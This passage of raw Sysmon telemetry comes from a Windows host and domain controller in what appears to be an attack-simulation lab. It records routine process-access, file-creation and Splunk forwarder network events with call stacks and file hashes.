08:09:28.601{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810721Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:28.601{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810720Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:28.601{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810719Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:28.601{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810718Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:28.601{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810717Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:28.601{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810716Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:28.601{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F8B8-60EB-F079-00000000D001}3776C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000810715Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:28.601{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F8B8-60EB-F079-00000000D001}3776C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000810714Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:28.586{0C1E0330-F8B8-60EB-F079-00000000D001}3776C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000810713Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:28.523{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4DD405E99DBF4A18C2344BBFB03E1D79,SHA256=7DCBBDBDEE9634642BBED8014E19284B92B8A292F15E83B41D8C274DFAD3EE03,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055278Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:28.105{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=03D9EC858355A807BAA4E4CA2F914EE5,SHA256=40E93250A73BFE951916065F045EE9E3A9690A9DD885AB930250F13C4F2C9142,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810712Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:28.273{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BC86A9BF743B7D69F93BB415B2821339,SHA256=ABC4FB4A000A1AB73A9665C982C08973A0E41BB06E8A54A7F8E8F7D480C09614,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000810711Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:28.039{0C1E0330-F8B7-60EB-EF79-00000000D001}37442660C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000810730Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:29.601{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=67DEB028ACEB0F1C45F006B82F47F7BE,SHA256=D7966E10B7D8A8E8F67800CAD7352F2FB11B4601C9210A3DE036D52E6193A738,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810729Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:29.539{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C40F1CD9D2DA207F5F2AB5FAB19DB7DE,SHA256=41FA1789CCD7D6F55CB91BA5FA524FF096CD4E0A92A21FF22F8CB518B06B5D20,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055279Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:29.121{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=919826E4973B337CB1F6993DFF7B309E,SHA256=C7004F185D99483A8A18D495092D3C2E528469A10C807F4FDC0ADE375A6520D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810732Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:30.554{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=653F6DD4D9BAE48CEAEFF19D378CBAF2,SHA256=AD25EE639CEEF481A3E0651DB3B067041C68C573B839385D08B2DA44E3A1C897,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001055281Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:21.711{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61997-false10.0.1.12-8000- 23542300x80000000000000001055280Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:30.136{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=56DF4BB7F8CBF7A3550F2947F27878E8,SHA256=8E0224E5F8ACE03D81805CC57CE4D76230A166630EFA1168CC060558A579D42F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810731Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:30.226{0C1E0330-0490-60E8-1200-00000000D001}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=633BC04BD26EDE8A2FAA54B1BBFC8FC6,SHA256=915FA374AEF8FCDAE880956A62D2AC6659632F29187A03F127D15385AFB11D5C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810733Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:31.554{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8FD0763F451D16AB571DDAC0571595FC,SHA256=57820BC5938CE4FCD6D5463A7E2BE08CE34F6AFF7218C357A16CE9D0FEBD873D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055282Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:31.152{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=95909658ED3406ECAB3E240739A08CEB,SHA256=E60F6AC662BAD5618E02A9C58A52DF6BF38C2545E7D219F69709E91733570B42,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810734Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:32.570{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=14052D2D9E443EC954A317B96918D428,SHA256=55B038DBFA5F9126CF7A020925A53D6358E113F7633BF70323887E3874B4621C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055283Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:32.152{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F4F78C44E1DCB53BEB47D31CEEF0226,SHA256=C15F261DAE6F3F9DC1BC1C1E890C3F50536643B7FC745050E50D4BEA5FE9E57F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810735Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:33.574{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A79CF52AD2C0EFA88D7F9188EEEEEAF,SHA256=A10CD6D54424B62477B562D93ACD640219B4BD800289E1DACA7E57404D4EFFD3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055284Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:33.167{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F8265C1142E14F61A70E763EDB09CF53,SHA256=445C7EAED102654B608F2BF7948149A61BF76EE34546ED561588C8ED65EB2F16,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810737Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:33.203{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57486-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000810736Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:34.601{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BF726AC63623F4B6195663E1E9127697,SHA256=E8091794B941012AE9B1B2670D179AF2994E44AF877CC5CB6E5352A27E948B9B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055285Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:34.183{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F8A35E2F94855DB9E03B81988135BF54,SHA256=FE0A15BBA6455FD2B68CFC77AB901B033B04A07385FA56B812F2D8A76CB79766,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810738Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:35.636{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4DECAC6D67E35A07CAD281B6DA045A7F,SHA256=CB8C036410551C5BDB8FAB4695A5C5211A556BB5667D0FA0B46E8804759920B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055286Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:35.202{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=73B5F3E5A28685D9AC6AA2F01044DC55,SHA256=F46FD96ED21AF4A0378D776F44D4F469DD9CDC4B192129D000ADCF6B5BFFC9EA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810739Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:36.652{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8581B93CA40BE2DF841B4E93DA3AC3A8,SHA256=CF3F401DBA58BACDAACAEDFD42EB421E7F4D051C9EBC25B3340141620EE29FD0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055361Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.602{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=33170AEA4234D0CB076331D435D80951,SHA256=DDD9F161768D572CBF78B0914973FA72E54A8A432EF23BA2BC48D8A606946FBF,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001055360Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:27.706{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61998-false10.0.1.12-8000- 10341000x80000000000000001055359Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055358Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055357Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055356Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055355Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055354Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 